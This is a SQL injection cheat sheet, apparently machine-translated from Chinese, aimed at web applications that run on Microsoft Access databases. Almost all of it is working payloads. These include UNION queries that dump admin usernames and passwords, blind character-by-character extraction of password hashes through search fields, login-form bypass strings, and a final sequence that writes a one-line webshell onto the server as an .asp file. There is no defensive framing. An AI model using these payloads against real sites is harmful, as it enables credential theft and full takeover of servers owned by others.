Access Injection Daquan

Access injection into Access offset injection access search injection access login box injection

1. Judgment injection.

and 1=1
and 1=2
Or
-0
-1 See the changes in the page

2. Access injection.

Federated queries
ORDER BY 10
and 1=2 Union select 1,2,3,4,5,6,7,8,9,10 from admin
and 1=2 Union select 1,username,3,4,password,6,7,8,9,10 from admin

3. Access offset injection. Condition must have ID field

ORDER BY 13
and 1=2 Union select 1,2,3,4,5,6,7,8,9,* from admin until * normal

13-9=4 4*2=8 13-8=5
and 1=2 Union select 1,2,3,4,5,* from (admin as a inner join admin as B on a.id=b.id)

4. Access Explode fields

SELECT * from next where id=1 ORDER by sum (1)
Can only burst a word Geru for bm_username to guess the other.

You can also view the source code lookup field from the background of the website

5. Access-Search Injection

2010% ' and (select COUNT (*) from mssysaccessobjects) >0 and '% ' = '//return to normal. Access database
2010% ' and (select COUNT (*) from admin) >0 and '% ' = '//return to the normal presence of the admin table
2010% ' and (select COUNT (username) from admin) >0 and '% ' = '//return to normal, presence username field
2010% ' and (select count (password) from admin) >0 and '% ' = '//return to normal, and there is a password field
2010% ' and (select top 1 len (username) from admin) >4 and '% ' = '//return normal username length greater than 4
2010% ' and (select top 1 len (username) from admin) =5 and '% ' = '//return normal username length equals 5
2010% ' and (select top 1 len (password) from admin) =32 and '% ' = '//return to normal, password length is 32-bit encryption.

Username Length 5
Password Length 32

2010% ' and (select top 1 ASC (Mid (username,1,1)) from admin) =97 and '% ' = '//a
The following are ASCII encodings of the corresponding locations, and if not, an error is returned.
2010% ' and (select top 1 ASC (Mid (password,1,1)) from admin) =48 and '% ' = ',
2010% ' and (select top 1 ASC (Mid (password,2,1)) from admin) =102 and '% ' = '
2010% ' and (select top 1 ASC (Mid (password,3,1)) from admin) =101 and '% ' = '
2010% ' and (select top 1 ASC (Mid (password,4,1)) from admin) =102 and '% ' = '

This query is too time-consuming to try the Union union query
2010% ' ORDER by ten and '% ' = '
2010% ' and 1=2 Union select 1,2,3,4,5,6,7,8,9,10 from admin and '% ' = '
2010% ' and 1=2 Union select 1,username,3,4,password,6,7,8,9,10 from admin and '% ' = '

6. Access Login Box Injection

1. A ' or (select COUNT (*) from admin) >0 and ' 1 ' = ' 1
2. A ' or (select COUNT (username) from admin) >0 and ' 1 ' = ' 1
3. A ' or (select count (password) from admin) >0 and ' 1 ' = ' 1

This query is too time-consuming to try the Union union query

A ' union select 1,2,3,4,5,6,7,8,9,10 from Admin and ' 1 ' = ' 1
A ' union select 1,username,3,4,password,6,7,8,9,10 from Admin and ' 1 ' = ' 1

7.ACCESS Execute SQL statement export one sentence take Webshell

The first sentence of code
1.create table cmd (a varchar (50))
The second line of code
1.insert into cmd (a) VALUES (' one word trojan ')
The third line of code
1.select * into [a] in ' E:\host\web2011\ok.asp;ok.xls ' Excel 4.0; ' from cmd
The code of the sentence four
1.drop table cmd

Access Injection Daquan